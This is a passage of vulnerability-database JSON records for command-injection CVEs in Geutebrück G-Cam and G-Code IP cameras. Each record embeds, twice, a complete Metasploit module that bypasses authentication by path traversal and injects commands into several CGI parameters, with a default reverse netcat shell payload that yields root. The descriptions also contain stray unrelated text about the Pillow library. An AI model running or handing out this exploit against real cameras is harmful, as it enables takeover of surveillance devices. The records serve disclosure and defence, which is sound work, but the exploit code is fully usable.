"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33551",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33551",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2086",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33551"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33551"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33551",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33551",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33551"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"id": "VAR-202109-0860",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:08:56.110000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Multiple Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158066"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33551"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33551"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:23.217000",
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2086"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:52.063000",
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
}
],
"trust": 0.6
}
}
VAR-202109-0596
Vulnerability from variot - Updated: 2025-01-30 21:03Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0596",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
